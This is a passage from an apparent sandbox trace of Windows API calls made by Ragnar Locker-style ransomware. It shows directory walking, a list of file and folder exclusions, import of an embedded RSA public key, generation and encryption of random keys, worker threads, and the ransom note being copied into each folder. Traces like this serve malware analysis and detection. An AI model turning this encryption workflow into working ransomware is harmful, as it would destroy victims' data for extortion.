lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.073] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0175.073] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned=".xml" [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0175.073] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0175.074] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0175.074] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0175.074] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0175.074] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0175.074] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0175.074] GetProcessHeap () returned 0x3520000 [0175.074] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0175.075] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0175.075] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.075] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.075] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0175.075] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned=".dll" [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0175.075] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0175.076] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0175.076] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0175.076] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0175.076] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0175.076] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.076] GetProcessHeap () returned 0x3520000 [0175.076] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586840 [0175.076] CryptAcquireContextW (in: phProv=0x3586840, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586840*=0x35565d8) returned 1 [0175.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0175.077] GetProcessHeap () returned 0x3520000 [0175.077] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e748 [0175.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e748, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0175.077] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.077] GetProcessHeap () returned 0x3520000 [0175.077] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0175.077] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0175.077] GetProcessHeap () returned 0x3520000 [0175.077] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e748 | out: hHeap=0x3520000) returned 1 [0175.077] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0175.077] CryptImportPublicKeyInfo (in: hCryptProv=0x35565d8, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586844 | out: phKey=0x3586844*=0x3547c40) returned 1 [0175.078] GetProcessHeap () returned 0x3520000 [0175.078] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0175.078] LocalFree (hMem=0x35948f0) returned 0x0 [0175.078] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556660) returned 1 [0175.079] CryptGenRandom (in: hProv=0x3556660, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0175.079] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.079] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.082] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556660) returned 1 [0175.082] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.082] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.082] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.084] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556660) returned 1 [0175.085] CryptGenRandom (in: hProv=0x3556660, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0175.085] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.085] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.087] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556660) returned 1 [0175.087] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.087] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.087] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.185] CryptEncrypt (in: hKey=0x3547c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.186] GetLastError () returned 0x80090016 [0175.186] CryptEncrypt (in: hKey=0x3547c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.186] GetLastError () returned 0x80090016 [0175.186] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x11ac) returned 0x3f0 [0175.187] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556660) returned 1 [0175.187] CryptGenRandom (in: hProv=0x3556660, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0175.187] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.187] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0175.236] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556660) returned 1 [0175.237] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0175.237] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.237] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0175.239] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556660) returned 1 [0175.240] CryptGenRandom (in: hProv=0x3556660, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0175.240] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.240] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0175.242] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556660) returned 1 [0175.242] CryptGenRandom (in: hProv=0x3556660, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0175.243] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0175.243] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0175.245] CryptEncrypt (in: hKey=0x3547c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.245] GetLastError () returned 0x80090016 [0175.245] CryptEncrypt (in: hKey=0x3547c40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0175.246] GetLastError () returned 0x80090016 [0175.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x126c) returned 0x3b4 [0175.246] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3f0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0175.336] GetProcessHeap () returned 0x3520000 [0175.336] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586840 | out: hHeap=0x3520000) returned 1 [0175.336] CloseHandle (hObject=0x3f0) returned 1 [0175.337] GetProcessHeap () returned 0x3520000 [0175.337] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0175.338] CloseHandle (hObject=0x3b4) returned 1 [0175.338] GetProcessHeap () returned 0x3520000 [0175.338] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0175.338] FindClose (in: hFindFile=0x3547cc0 | out: hFindFile=0x3547cc0) returned 1 [0175.339] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0175.339] lstrcmpiW (lpString1="1044", lpString2=".") returned 1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="..") returned 1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Windows") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Windows.old") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Tor browser") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Internet Explorer") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Google") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Opera") returned -1 [0175.339] lstrcmpiW (lpString1="1044", lpString2="Opera Software") returned -1 [0175.340] lstrcmpiW (lpString1="1044", lpString2="Mozilla") returned -1 [0175.340] lstrcmpiW (lpString1="1044", lpString2="Mozilla Firefox") returned -1 [0175.340] lstrcmpiW (lpString1="1044", lpString2="$Recycle.Bin") returned 1 [0175.340] lstrcmpiW (lpString1="1044", lpString2="ProgramData") returned -1 [0175.340] lstrcmpiW (lpString1="1044", lpString2="All Users") returned -1 [0175.340] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0175.340] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1044" | out: lpString1="1044") returned="1044" [0175.340] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\" [0175.340] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1044\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\" [0175.340] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\!$R4GN4R_B8CF767A$!.txt" [0175.340] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1044\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0175.345] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*" [0175.345] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.345] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.345] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.345] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c80 [0175.345] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0175.345] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf5d92130, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.347] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0175.347] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0175.347] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d92130, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5d92130, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.347] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0175.347] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0175.347] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.347] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0175.347] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0175.347] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.347] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0175.347] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0175.347] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.347] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0175.347] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0175.347] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.348] FindClose (in: hFindFile=0x3547c80 | out: hFindFile=0x3547c80) returned 1 [0175.348] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548240 [0175.349] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf5d92130, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf5d92130, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.350] FindNextFileW (in: hFindFile=0x3548240, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, 